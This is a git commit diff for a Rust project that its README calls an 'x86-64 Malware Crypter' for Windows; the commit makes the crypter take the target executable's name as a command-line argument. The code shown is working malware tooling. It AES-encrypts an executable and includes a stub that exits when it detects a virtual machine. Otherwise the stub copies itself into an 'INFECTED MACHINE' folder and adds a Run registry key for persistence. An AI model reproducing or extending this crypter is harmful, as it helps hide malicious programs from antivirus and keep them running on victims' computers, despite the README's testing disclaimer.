Adding the ability to pass the EXE name as a commandline argument. I like this better than having a hardcoded exe name

.gitignore

@@ -0,0 +1 @@
+**/target/**

README.md

@@ -2,8 +2,8 @@
 x86-64 Malware Crypter built in Rust for Windows with Anti-VM, powered by memexec
 
 ## Usage
-1. Put your Portable Executable in /crypt/ and rename it to example.exe (or change the code to be the same name as your PE)
-2. In /crypt/ `cargo run` 
+1. Put your Portable Executable in /crypt/ 
+2. In /crypt/ `cargo run <name_of_pe.exe>` 
 (will output encrypted_bytes.bin and key.txt)
 3. move encrypted_bytes.bin and key.txt to /stub/src/
 4. In /stub/ `cargo build --target x86_64-pc-windows-gnu --release` or build without `--release` to keep debug symbols
@@ -24,7 +24,7 @@ x86-64 Malware Crypter built in Rust for Windows with Anti-VM, powered by memexe
 - Obfuscated Strings
 
 ## Disclaimer
-This is a tool used to test the Dynamic detection capabilites of AV and EDR, use of this project is at your own risk
+This is a tool used to test the Static + Dynamic detection capabilites of AV and EDR, use of this project is at your own risk
 
 ## MITRE TTPs (Indicators)
 - User Execution: Malicious File T1204.002

crypt/src/main.rs

@@ -1,17 +1,23 @@
+use aes::cipher::{generic_array::GenericArray, BlockEncrypt, KeyInit};
 use aes::Aes128;
-use aes::cipher::{
-    BlockEncrypt, KeyInit,
-    generic_array::GenericArray,
-};
+use rand::rngs::StdRng;
+use rand::{RngCore, SeedableRng};
 use std::fs::read;
 use std::fs::File;
 use std::io::prelude::*;
-use rand::rngs::StdRng;
-use rand::{RngCore, SeedableRng};
 
 fn main() -> std::io::Result<()> {
     // Read input file into a vector RENAME example.exe to what you want and put it in this "crypt" folder
-    let plaintext_bytes = read("hexowl.exe").expect("Failed to read file");
+    let args: Vec<String> = std::env::args().collect();
+    if args.len() < 2 {
+        println!("Run with {} <inputfile.exe>", args.get(0).unwrap());
+        return Err(std::io::Error::new(
+            std::io::ErrorKind::NotFound,
+            "file input not found",
+        ));
+    }
+    let fname = args.get(1).unwrap();
+    let plaintext_bytes = read(fname).expect("Failed to read file");
 
     let mut encrypted_file = File::create("encrypted_Input.bin")?;
     let mut key_file = File::create("key.txt")?;
@@ -43,4 +49,4 @@ fn main() -> std::io::Result<()> {
     encrypted_file.write_all(&enc_bytes)?;
     key_file.write_all(&key)?;
     Ok(())
-}
+}

stub/src/main.rs

@@ -1,27 +1,20 @@
+use aes::cipher::{generic_array::GenericArray, BlockDecrypt, KeyInit};
 use aes::Aes128;
-use aes::cipher::{BlockDecrypt, KeyInit,
-    generic_array::GenericArray,
-};
 use inside_vm::inside_vm;
-use std::process::Command;
-use std::{fs, env};
-use std::io::{Read, Cursor, self};
 use std::io::Result;
+use std::io::{self, Cursor, Read};
 use std::path::Path;
+use std::process::Command;
+use std::{env, fs};
 use winreg::enums::{HKEY_CURRENT_USER, KEY_ALL_ACCESS};
 use winreg::RegKey;
 
-
 fn main() {
-
-    if inside_vm(){
-
+    if inside_vm() {
         println!("This is in a vm");
 
         std::process::exit(0);
-
     } else {
-
         println!("NO VM");
 
         create_infected_directory();
@@ -43,7 +36,7 @@ fn decrypt_file() -> Result<Vec<u8>> {
     let key = GenericArray::from(key_bytes);
     let cipher = Aes128::new(&key);
 
-    // Decrypt the encrypted bytes in blocks 
+    // Decrypt the encrypted bytes in blocks
     let mut decrypted_bytes = Vec::new();
     for block in encrypted_bytes.chunks(16) {
         let mut block_array = GenericArray::clone_from_slice(block);
@@ -54,9 +47,9 @@ fn decrypt_file() -> Result<Vec<u8>> {
     // Unpad the decrypted bytes
     let padding_size = decrypted_bytes.last().unwrap().clone() as usize;
     let decrypted_bytes = (&decrypted_bytes[..decrypted_bytes.len() - padding_size]).to_vec();
-    
+
     // return decrypted bytes
-    Ok(decrypted_bytes, )
+    Ok(decrypted_bytes)
 }
 
 fn create_infected_directory() -> io::Result<()> {
@@ -64,9 +57,8 @@ fn create_infected_directory() -> io::Result<()> {
     fs::create_dir_all(&infected_dir)?;
 
     let current_exe = env::current_exe()?;
-    let current_exe_filename = current_exe
-        .file_name();
-    
+    let current_exe_filename = current_exe.file_name();
+
     let infected_exe_path = infected_dir.join(current_exe_filename.unwrap());
     fs::copy(&current_exe, &infected_exe_path)?;
 
@@ -85,17 +77,18 @@ fn create_infected_directory() -> io::Result<()> {
 }
 
 fn persistence() -> io::Result<()> {
-
     if let Ok(current_exe) = env::current_exe() {
         if let Some(file_name) = current_exe.file_stem() {
-
             let executable_name = file_name.to_string_lossy();
             let directory_path = "C:/Rust Crypter - INFECTED MACHINE/";
             let file_path = format!("{}{}.exe", directory_path, executable_name);
 
             // Open the "Run" registry key
             let hkcu = RegKey::predef(HKEY_CURRENT_USER);
-            let run_key = hkcu.open_subkey_with_flags("Software\\Microsoft\\Windows\\CurrentVersion\\Run", KEY_ALL_ACCESS)?;
+            let run_key = hkcu.open_subkey_with_flags(
+                "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
+                KEY_ALL_ACCESS,
+            )?;
 
             // Add the executable path to the "Run" registry key
             run_key.set_value("RustCrypter", &file_path).err();